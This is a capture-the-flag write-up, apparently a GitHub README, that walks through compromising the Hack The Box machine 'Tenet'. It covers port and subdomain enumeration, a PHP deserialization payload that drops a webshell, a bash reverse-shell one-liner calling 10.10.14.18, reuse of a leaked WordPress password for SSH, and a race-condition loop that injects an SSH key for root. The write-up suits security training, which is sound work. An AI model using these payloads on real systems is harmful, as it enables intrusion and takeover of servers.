Skip to content

Latest commit

 

History

History
183 lines (94 loc) · 3.95 KB

README.md

File metadata and controls

183 lines (94 loc) · 3.95 KB
Raw

Tenet

nmap -p- --min-rate 10000 10.10.10.223 -Pn

alt text

After detection of open ports, let's do greater nmap scan here.

nmap -A -sC -sV -p22,80 10.10.10.223 -Pn

alt text

While browsing Wordpress website, I see tenet.htb domain.

alt text

Let's add this into /etc/hosts file for resolving purposes.

Let's do Subdomain Enumeration via wfuzz command.

wfuzz -c -H "Host: FUZZ.tenet.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.10.223 --hh 10918

alt text

I add www.tenet.htb domain name also into /etc/hosts file.

Our tenet.htb application is like below.

alt text

Let's do Directory Enumeration for tenet.htb web application.

gobuster dir -u http://tenet.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 40 -x php,txt,bak

alt text

Now, it's time to enumerate web application. I find a comment for one blog says information leakage.

alt text

Let's look at sator.php and sator.php.bak files on tenet.htb, but can't find anything.

I found these files by resolving ip address itself.

Let's look at old sator.php file.

alt text

While I browse sator.php file, it says such comments on web application.

alt text

From sator.php.bak file, I see that there's serialized keyword is used, it means there can be Insecure Deserialization attack.

Let's write webshell code for DatabaseExport class.

<?php

class DatabaseExport {

    public $user_file = "dr4ks.php";
    public $data = '<?php system($_REQUEST["cmd"]); ?>';

}

$sploit = new DatabaseExport;
echo serialize($sploit);
?>

While I run this code php dr4ks.php, it gives me such output.

alt text

Let's upload our malicious file into web application via curl command and we should make URL Encoding.

curl -G http://10.10.10.223/sator.php --data-urlencode 'arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:9:"dr4ks.php";s:4:"data";s:34:"<?php system($_REQUEST["cmd"]); ?>";}'

alt text

Let's check that our webshell is located or not by browsing.

curl http://10.10.10.223/dr4ks.php?cmd=id

alt text

It's time to add reverse shell payload into command section.

curl -X GET http://10.10.10.223/dr4ks.php -G --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.18/1337 0>&1"'

alt text

I got reverse shell from port 1337.

alt text

Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg 
export TERM=xterm
export SHELL=bash

alt text

I find wp-config.php file on /var/www/html/wordpress directory which contains sensitive credentials.

alt text

neil: Opera2112

Let's connect into machine via ssh.

user.txt

alt text

While I look at privileges of this user via sudo -l command, I see enableSSH.sh script.

alt text

I see addKey() function is located here, I need to abuse this for entering my public key (id_rsa.pub) file.

alt text

Let's inject our pubcliy (id_rsa.pub) file as below to make Race Condition vulnerability.

while true; do for fn in /tmp/ssh-*; do echo "{public_key}" > $fn; done; done

alt text

Note: But, we need to run sudo enableSSH.sh this on another terminal due to abusing Race Condition vulnerability.

alt text

From above image, I need to see Error in creating key file! word after this I can login into machine for root account by using my private key (id_rsa) file.

root.txt

alt text